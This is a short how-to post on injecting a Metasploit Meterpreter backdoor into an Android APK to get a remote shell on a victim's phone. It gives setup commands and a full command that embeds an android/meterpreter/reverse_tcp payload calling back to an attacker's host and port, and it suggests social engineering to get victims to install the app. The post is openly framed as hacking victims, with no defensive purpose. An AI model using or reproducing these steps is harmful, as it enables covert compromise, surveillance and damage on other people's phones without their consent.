How to automatic inject backdoor to Android APK file and get shell

In a more informal language, it’s a tool which we can use to perform various kinds of hacks against a machine. The flagship payload which comes with the Metasploit Framework is the ‘Meterpreter’, which also has an Android version that comes as an .apk file. In case you are wondering what a payload is,  it’s a program we can install on a victim’s system to compromise it. Normally we have to install the Meterpreter payload in the victims phone by any means [Usually involving Social Engineering], and when the victim runs the application, we would get a direct connection to that phone remotely and we can use it to wreak havoc on it.

Usage

apt-get install lib32stdc++6 lib32ncurses5 lib32z1

1.  Choose any apk file
2. Download apk-embed-payload.rb ruby script
3. Open a terminal, and type the following command

   ruby apk-embed-payload.rb app_file.apk -p android/meterpreter/reverse_tcp LHOST=192.168.0.104 LPORT=1337

    

    

DEMO

https://www.youtube.com/watch?v=iE8EskT-IKI